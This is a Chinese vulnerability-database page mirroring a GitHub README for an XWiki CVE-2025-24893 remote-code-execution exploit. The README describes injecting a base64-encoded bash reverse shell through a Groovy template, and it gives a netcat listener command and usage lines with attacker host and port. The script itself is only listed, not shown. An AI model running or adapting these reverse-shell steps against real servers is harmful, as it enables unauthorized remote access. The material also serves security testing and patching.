漏洞平台

POC详情： 39c283efc3daca27997906912a8317b788fe4e70

来源

https://github.com/Bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

关联漏洞

标题： XWiki Platform 安全漏洞 (CVE-2025-24893)
描述：XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞，该漏洞源于任何来宾用户都可以通过对SolrSearch的请求，造成远程代码执行。

描述

CVE-2025-24893 RCE exploit for XWiki with reverse shell capability

介绍

# CVE-2025-24893 Reverse Shell Exploit for XWiki

**Disclaimer:** This script is intended for **educational purposes and authorized security testing only**. Do **not** use on systems you do not own or have explicit permission to test. Misuse can be illegal and dangerous.

## Description
This Python script exploits **CVE-2025-24893**, a Remote Code Execution vulnerability affecting XWiki versions up to **15.10.10**.

- **Tested Version:** XWiki 15.10.8
- **Impact:** Allows execution of arbitrary commands on the target server.
- **Python Version:** Written and tested in **Python 3**

This version **extends the original PoC** by Al Baradi Joy to spawn a **reverse shell**. The original PoC can be found [here](https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py).

## How It Works
- XWiki executes Groovy code via the URL parameter.
- The exploit injects a **`bash -c` command** into this Groovy template.
- A normal reverse shell contains multiple quotes (`'` and `"`) that would **break Groovy evaluation** and the URL.
- To solve this, the script **encodes the one-line shell command in Base64**.
- The payload is then sent in the URL and executed using the following chain:

    `{echo,<base64>} | {base64,-d} | {bash,-i}`

- This decodes the Base64 payload safely and executes it with `bash -i`, giving an interactive reverse shell.

## Target URL Format
- **Format:** `http://<target-host>`
- **Do NOT include:**
  - A trailing slash `/` at the end
  - The `/xwiki` path (the script appends it automatically)

**Examples:**

    # Correct
    http://10.129.95.114:8080
    http://example.com:8080

    # Incorrect
    http://10.129.95.114:8080/         # trailing slash
    http://example.com/xwiki            # includes /xwiki

## Listener Setup
Before running the exploit, you **must start a listener** on your machine to catch the reverse shell.

**Example using Netcat:**

    nc -lvnp <lport>

- `<lport>` should match the port you provide as an argument to the script.

## Usage

    python3 cve-2025-24893.py <target_base_url> <lhost> <lport>

**Example:**

    python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444

- The script prints the full exploit URL, Base64 payload, and instructions for checking your listener.

## References
- [GHSA Advisory](https://github.com/advisories/GHSA-rr6p-3pfg-562j)
- [XWiki Homepage](https://www.xwiki.org/)
- Original PoC by [Al Baradi Joy](https://github.com/a1baradi/Exploit/blob/main/CVE-2025-24893.py)

## Credits
- Original Proof-of-Concept: Al Baradi Joy
- This version: Upgraded to spawn a reverse shell for interactive command execution

## Warning
- Use this exploit **only in controlled environments** (HTB, lab machines, VMs you own).
- Unauthorized use on public servers is illegal and can result in criminal charges.

文件快照


 [4.0K]  /data/pocs/39c283efc3daca27997906912a8317b788fe4e70
├── [2.7K]  README.md
└── [3.3K]  xwiki_exploit.py

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。